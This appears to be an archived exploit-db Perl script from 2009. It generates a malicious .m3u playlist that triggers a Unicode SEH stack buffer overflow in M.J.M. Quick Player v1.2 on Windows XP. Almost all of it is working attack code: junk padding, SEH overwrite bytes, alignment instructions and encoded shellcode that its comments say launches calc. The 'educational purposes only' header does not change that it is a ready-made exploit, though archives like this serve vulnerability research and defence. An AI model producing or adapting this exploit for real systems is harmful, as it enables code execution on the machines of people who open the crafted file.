exploit-db-mirror/exploits/windows/local/10759.pl

# [*] Vulnerability     : M.J.M. Quick Player v1.2 Stack BOF
# [*] Discovered by     : mr_me (seeleymagic[at]hotmail[dot]com)
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : dec 28th, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : M.J.M. Quick Player
# [*] Versions affected : 1.2  (Latest version is not vulnerable)
# [*] Download from     : http://www.brothersoft.com/quick-player-135853.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH / Unicode
# [*] Tested on         : XP SP3 En (VirtualBox)
# [*] Greetz&Tx to      : mr_me/EdiStrosar/Rick2600/MarkoT
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.
#                                               MMMMM?.
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
# Open file in playlist - calc !
#
print "[+] Preparing payload\n";
my $sploitfile="corelanc0d3r_quicksploit.m3u";
my $header="#EXTM3U\n\nHTTP://";
my $junk="A" x 529;
my $field1="\x41\x6d";
my $field2="\x41\x4d";  #boy I love pvefindaddr :-)
my $stuff="\x58\x6d";
$stuff=$stuff."\x05\x02\x01\x6d";
$stuff=$stuff."\x2d\x01\x01\x6d";
$stuff=$stuff."\x50\x6d\xc3";
my $morestuff="D" x 111;
# I think this will execute calc :-)
my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTKJL2HO0QU48QUQXBC1Q2L2C4MPEL80P6XLMO53VSLKOHPP1WSKOXPA";
my $payload=$header.$junk.$field1.$field2.$stuff.$morestuff.$shellcode;
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to ".$sploitfile."\n";